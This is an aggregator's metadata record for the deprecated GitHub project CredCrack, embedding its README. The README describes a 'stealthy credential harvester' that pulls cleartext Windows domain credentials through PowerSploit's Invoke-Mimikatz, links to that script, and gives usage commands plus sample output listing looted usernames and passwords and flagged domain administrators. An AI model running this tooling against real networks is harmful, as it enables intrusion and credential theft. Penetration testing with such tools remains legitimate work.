{"id":13647550,"url":"https://github.com/jobroche/CredCrack","last_synced_at":"2025-04-22T02:32:02.836Z","repository":{"id":35346774,"uuid":"39609128","full_name":"jobroche/CredCrack","owner":"jobroche","description":"A fast and stealthy credential harvester","archived":false,"fork":false,"pushed_at":"2023-07-11T03:14:09.000Z","size":37,"stargazers_count":619,"open_issues_count":5,"forks_count":108,"subscribers_count":54,"default_branch":"master","last_synced_at":"2024-12-20T13:03:04.457Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jobroche.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2015-07-24T03:11:00.000Z","updated_at":"2024-12-10T09:45:12.000Z","dependencies_parsed_at":"2024-01-13T03:13:02.153Z","dependency_job_id":null,"html_url":"https://github.com/jobroche/CredCrack","commit_stats":null,"previous_names":["jobroche/credcrack","gojhonny/credcrack"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jobroche%2FCredCrack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jobroche%2FCredCrack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jobroche%2FCredCrack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jobroche%2FCredCrack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jobroche","download_url":"https://codeload.github.com/jobroche/CredCrack/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":250163722,"owners_count":21385298,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-02T01:03:38.311Z","updated_at":"2025-04-22T02:32:02.599Z","avatar_url":"https://github.com/jobroche.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"# CredCrack\n\n⛔ [DEPRECATED]. This repo is no longer being maintained. Please consider using [CrackMapExec](https://github.com/mpgn/CrackMapExec).\n\n## Introduction\n-----\n\nCredCrack is a fast and stealthy credential harvester. It exfiltrates credentials recusively in memory and in the clear. Upon completion, CredCrack will parse and output the credentials while identifying any domain administrators obtained. CredCrack also comes with the ability to list and enumerate share access and yes, it is threaded!\n\nCredCrack has been tested and runs with the tools found natively in Kali Linux. CredCrack solely relies on having PowerSploit's \"Invoke-Mimikatz.ps1\" under the /var/www directory. [Download Invoke-Mimikatz Here](https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1)\n\n## Help\n-----\n```\nusage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]\n                    [-l LHOST] [-t THREADS]\n\nCredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -f FILE, --file FILE  File containing IPs to harvest creds from. One IP per\n                        line.\n  -r RHOST, --rhost RHOST\n                        Remote host IP to harvest creds from.\n  -es, --enumshares     Examine share access on the remote IP(s)\n  -l LHOST, --lhost LHOST\n                        Local host IP to launch scans from.\n  -t THREADS, --threads THREADS\n                        Number of threads (default: 10)\n\nRequired:\n  -d DOMAIN, --domain DOMAIN\n                        Domain or Workstation\n  -u USER, --user USER  Domain username\n\nExamples: \n\n./credcrack.py -d acme -u bob -f hosts -es\n./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20\n```\n\n## Examples\n-----\n\n### Enumerating Share Access\n\n```\n./credcrack.py -r 192.168.1.100 -d acme -u bob --es\nPassword:\n ---------------------------------------------------------------------\n  CredCrack v1.1 by Jonathan Broche (@g0jhonny)\n ---------------------------------------------------------------------\n \n[*] Validating 192.168.1.102\n[*] Validating 192.168.1.103\n[*] Validating 192.168.1.100\n\n -----------------------------------------------------------------\n 192.168.1.102 - Windows 7 Professional 7601 Service Pack 1 \n -----------------------------------------------------------------\n \n OPEN      \\\\192.168.1.102\\ADMIN$ \n OPEN      \\\\192.168.1.102\\C$ \n\n -----------------------------------------------------------------\n 192.168.1.103 - Windows Vista (TM) Ultimate 6002 Service Pack 2 \n -----------------------------------------------------------------\n \n OPEN      \\\\192.168.1.103\\ADMIN$ \n OPEN      \\\\192.168.1.103\\C$ \n CLOSED    \\\\192.168.1.103\\F$ \n\n -----------------------------------------------------------------\n 192.168.1.100 - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 \n -----------------------------------------------------------------\n \n CLOSED    \\\\192.168.1.100\\ADMIN$ \n CLOSED    \\\\192.168.1.100\\C$ \n OPEN      \\\\192.168.1.100\\NETLOGON \n OPEN      \\\\192.168.1.100\\SYSVOL \n\n[*] Done! Completed in 0.8s\n```\n\n### Harvesting credentials\n-----\n\n```\n./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100\nPassword:\n\n ---------------------------------------------------------------------\n  CredCrack v1.1 by Jonathan Broche (@g0jhonny)\n ---------------------------------------------------------------------\n \n[*] Setting up the stage\n[*] Validating 192.168.1.102\n[*] Validating 192.168.1.103\n[*] Querying domain admin group from 192.168.1.102\n[*] Harvesting credentials from 192.168.1.102\n[*] Harvesting credentials from 192.168.1.103\n\n                  The loot has arrived...\n                         __________\n                        /\\____;;___\\    \n                       | /         /    \n                       `. ())oo() .      \n                        |\\(%()*^^()^\\       \n                       %| |-%-------|       \n                      % \\ | %  ))   |       \n                      %  \\|%________|       \n\n                \n[*] Host: 192.168.1.102 Domain: ACME User: jsmith Password: Good0ljm1th\n[*] Host: 192.168.1.103 Domain: ACME User: daguy Password: P@ssw0rd1!\n\n     1 domain administrators found and highlighted in yellow above!\n\n[*] Cleaning up\n[*] Done! Loot may be found under /root/CCloot folder\n[*] Completed in 11.3s\n```\n\n#### Contact\nContact me at [@g0jhonny](https://twitter.com/g0jhonny) with any questions or features you'd like to see in the next update. For bugs submit an [issue](https://github.com/gojhonny/CredCrack/issues/new)!\n\n#### Credits\nCredCrack couldn't have been possible without the contributions of the following individuals. You're all rockstars!\n[@JosephBialek](https://twitter.com/JosephBialek), [@brav0hax](https://twitter.com/brav0hax), [@altonjx](https://twitter.com/altonjx) and everyone else! Thank you for all your contributions and feedback to make this a better script, keep 'em coming! \n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjobroche%2FCredCrack","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fjobroche%2FCredCrack","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjobroche%2FCredCrack/lists"}